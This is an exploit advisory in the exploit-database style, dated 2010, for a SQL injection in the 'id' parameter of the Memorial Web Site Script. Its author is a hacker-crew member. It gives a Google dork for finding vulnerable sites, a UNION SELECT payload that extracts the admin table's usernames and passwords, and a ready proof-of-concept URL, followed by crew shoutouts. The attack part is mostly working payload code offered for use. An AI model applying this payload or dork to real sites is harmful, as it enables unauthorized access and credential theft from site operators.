[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Memorial Web Site Script (id) SQL Injection Vulnerability
# Published : 2010-04-23
# Author : v3n0m
# Previous Title : In-portal 5.0.3 Remote Arbitrary File Upload Exploit
# Next Title : EPay Enterprise v4.13 (cid) SQL Injection Vulnerability
) ) ) ( ( ( ( ( ) )
( /(( /( ( ( /( ( ( ( ) )) ) ) )) ) ) ) ( /( ( /(
)())())) ) )()) ) ) ) (()/(()/( ( (()/(()/((()/( )()) )())
((_)((_)(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) ) /(_))(_))/(_))(_)|((_)
__ ((_)((_)/(_))___ ((_) _ ) )___) _ )(_))(_))_ ((_)(_))(_)) (_)) _((_)_ ((_)
/ / _ (_)) __ / (_)_(_)(/ __(_)_(_) _ | | __| _ | |_ _|| | | |/ /
V / (_) || (_ | V / / _ | (__ / _ | /| |) | _|| / |__ | | | .` | ' <
|_| ___/ ___| |_| /_/ _ ___/_/ _|_|_|___/|___|_|_____|___||_|_|_|_
.WEB.ID
-----------------------------------------------------------------------
Memorial Web Site Script (id) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author : v3n0m
Site : http://yogyacarderlink.web.id/
Date : April, 23-2010
Location : Jakarta, Indonesia
Time Zone : GMT +7:00
----------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Memorial Web Site Script
Vendor : http://www.easy-scripts.net/
Price : $49 USD
Google Dork : allinurl:show_memorial.php?id=
people can create memorial with photo album and music and edit there
memorial and condoleances You can put it free of charge or apply a fee
to make a memorial You can add your adsense code in showmemorial pages
----------------------------------------------------------------
Exploit:
~~~~~~~
+and+1=2+union+all+select+1,2,group_concat(username,char(58),password)v3n0m,4,5,6,7,8+from+admin--
SQLi p0c:
~~~~~~~
http://127.0.0.1/[path]/show_memorial.php?id=[xxx][SQLi]
http://127.0.0.1/[path]/show_memorial.php?id=[xxx]+and+1=2+union+all+select+1,2,group_concat(username,char(58),password)v3n0m,4,5,6,7,8+from+admin--
** [xxx] = Valid id number
** After injected a target,get da scrolling your cursor down and you'll see the password unencrypted !
----------------------------------------------------------------
Shoutz:
~~~~
- 'You getz angry to me c'z you dunno what i did :( '
- LeQhi,lingah,GheMaX,spykit,m4rco,z0mb13,ast_boy,eidelweiss,xx_user,^pKi^,tian,zhie_o,JaLi-
- setanmuda,oche_an3h,onez,Joglo,d4rk_kn19ht,Cakill Schumbag
- kiddies,whitehat,c4uR [bang martabak keju satu,ga pake lama...],mywisdom,yadoy666,udhit
- BLaSTER & TurkGuvenligi & Agd_scorp (Turkey Hackers)
- elicha cristia [Mizz You...Mizz You...Mizz You... :)]
- N.O.C & Technical Support @office
- #yogyacarderlink @irc.dal.net
----------------------------------------------------------------
Contact:
~~~~
v3n0m | YOGYACARDERLINK CREW | v3n0m666[0x40]live[0x2E]com
Homepage: http://yogyacarderlink.web.id/
http://v3n0m.blogdetik.com/
http://elich4.blogspot.com/ << Update donk >_<
---------------------------[EOF]--------------------------------